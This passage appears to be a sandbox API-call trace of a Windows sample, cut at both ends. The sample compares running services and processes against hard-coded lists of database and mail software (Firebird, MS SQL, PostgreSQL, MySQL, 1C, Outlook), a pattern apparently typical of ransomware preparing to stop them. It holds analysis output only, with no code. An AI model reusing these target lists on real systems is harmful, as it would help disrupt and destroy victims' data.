returned 1 [0271.607] lstrlenW (lpString="DPS") returned 3 [0271.607] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0271.607] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0271.607] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0271.608] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0271.608] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0271.608] lstrlenW (lpString="eventlog") returned 8 [0271.608] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0271.608] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0271.608] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0271.608] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0271.608] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0271.608] lstrlenW (lpString="EventSystem") returned 11 [0271.608] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0271.608] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0271.608] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0271.608] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0271.608] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0271.608] lstrlenW (lpString="gpsvc") returned 5 [0271.608] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0271.608] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0271.608] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0271.608] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0271.608] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0271.608] lstrlenW (lpString="LanmanWorkstation") returned 17 [0271.608] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0271.608] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0271.608] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0271.608] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0271.608] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0271.608] lstrlenW (lpString="lmhosts") returned 7 [0271.608] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0271.608] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0271.608] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0271.608] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0271.608] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0271.608] lstrlenW (lpString="MMCSS") returned 5 [0271.608] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0271.609] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0271.609] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0271.609] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0271.609] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0271.609] lstrlenW (lpString="MpsSvc") returned 6 [0271.609] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0271.609] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0271.609] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0271.609] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0271.609] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0271.609] lstrlenW (lpString="NlaSvc") returned 6 [0271.609] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0271.609] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0271.609] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0271.609] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0271.609] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0271.609] lstrlenW (lpString="nsi") returned 3 [0271.609] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0271.609] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0271.609] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0271.609] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0271.609] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0271.609] lstrlenW (lpString="PcaSvc") returned 6 [0271.609] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0271.609] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0271.609] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0271.609] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0271.609] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0271.609] lstrlenW (lpString="PlugPlay") returned 8 [0271.610] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0271.610] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0271.610] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0271.610] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0271.610] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0271.610] lstrlenW (lpString="Power") returned 5 [0271.610] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0271.610] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0271.610] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0271.610] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0271.610] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0271.610] lstrlenW (lpString="ProfSvc") returned 7 [0271.610] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0271.610] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0271.610] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0271.610] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0271.610] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0271.610] lstrlenW (lpString="RpcEptMapper") returned 12 [0271.610] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0271.610] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0271.610] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0271.610] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0271.610] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0271.610] lstrlenW (lpString="RpcSs") returned 5 [0271.610] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0271.610] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0271.610] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0271.610] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0271.610] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0271.611] lstrlenW (lpString="SamSs") returned 5 [0271.611] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0271.611] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0271.611] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0271.611] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0271.611] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0271.611] lstrlenW (lpString="Schedule") returned 8 [0271.611] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0271.611] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0271.611] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0271.611] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0271.611] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0271.611] lstrlenW (lpString="SENS") returned 4 [0271.611] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0271.611] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0271.611] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0271.611] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0271.611] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0271.611] lstrlenW (lpString="ShellHWDetection") returned 16 [0271.611] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0271.611] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0271.611] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0271.611] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0271.611] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0271.611] lstrlenW (lpString="Spooler") returned 7 [0271.611] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0271.611] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0271.611] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0271.611] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0271.611] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0271.611] lstrlenW (lpString="Themes") returned 6 [0271.611] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0271.611] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0271.612] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0271.612] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0271.612] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0271.612] lstrlenW (lpString="UxSms") returned 5 [0271.612] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0271.612] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0271.612] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0271.612] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0271.612] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0271.612] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4262fb8 | out: hHeap=0x4a0000) returned 1 [0271.612] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x398 [0271.625] Process32FirstW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.626] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0271.627] lstrlenW (lpString="System") returned 6 [0271.627] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0271.627] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0271.627] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0271.627] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0271.627] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0271.627] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0271.627] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0271.627] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0271.627] lstrlenW (lpString="smss.exe") returned 8 [0271.627] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0271.627] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0271.627] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0271.627] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0271.627] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0271.627] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0271.627] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0271.630] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0271.630] lstrlenW (lpString="csrss.exe") returned 9 [0271.630] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0271.630] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0271.630] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0271.630] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0271.630] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0271.630] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0271.631] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0271.631] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0271.631] lstrlenW (lpString="wininit.exe") returned 11 [0271.631] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0271.631] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0271.631] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0271.631] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0271.631] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0271.631] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0271.631] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0271.631] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0271.632] lstrlenW (lpString="csrss.exe") returned 9 [0271.632] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0271.632] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0271.632] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0271.632] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0271.632] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0271.632] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0271.632] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0271.632] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0271.632] lstrlenW (lpString="winlogon.exe") returned 12 [0271.632] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0271.632] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0271.632] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0271.632] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0271.632] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0271.632] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0271.632] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0271.632] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0271.633] lstrlenW (lpString="services.exe") returned 12 [0271.633] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0271.633] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0271.633] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0271.633] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0271.633] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0271.633] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0271.633] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0271.633] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0271.633] lstrlenW (lpString="lsass.exe") returned 9 [0271.634] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0271.634] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0271.634] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0271.634] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0271.634] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0271.634] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0271.634] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0271.634] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0271.634] lstrlenW (lpString="lsm.exe") returned 7 [0271.634] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0271.634] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0271.634] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0271.634] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0271.634] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0271.634] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0271.634] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0271.634] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.635] lstrlenW (lpString="svchost.exe") returned 11 [0271.635] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0271.635] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0271.635] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0271.635] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0271.635] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0271.635] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0271.635] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0271.635] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.635] lstrlenW (lpString="svchost.exe") returned 11 [0271.635] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0271.635] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0271.635] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0271.635] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0271.635] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0271.636] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0271.636] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0271.636] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.636] lstrlenW (lpString="svchost.exe") returned 11 [0271.636] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0271.636] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0271.636] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0271.636] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0271.636] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0271.636] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0271.637] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0271.637] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.637] lstrlenW (lpString="svchost.exe") returned 11 [0271.637] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0271.637] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0271.637] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0271.637] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0271.637] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0271.637] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0271.637] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0271.637] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.637] lstrlenW (lpString="svchost.exe") returned 11 [0271.637] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0271.637] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0271.637] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0271.638] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0271.638] lstrlenW (lpString="audiodg.exe") returned 11 [0271.638] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.638] lstrlenW (lpString="svchost.exe") returned 11 [0271.638] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0271.639] lstrlenW (lpString="userinit.exe") returned 12 [0271.639] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x378, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0271.639] lstrlenW (lpString="explorer.exe") returned 12 [0271.639] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x420, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0271.639] lstrlenW (lpString="dwm.exe") returned 7 [0271.639] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.640] lstrlenW (lpString="svchost.exe") returned 11 [0271.640] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0271.640] lstrlenW (lpString="agent1c.exe") returned 11 [0271.640] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, 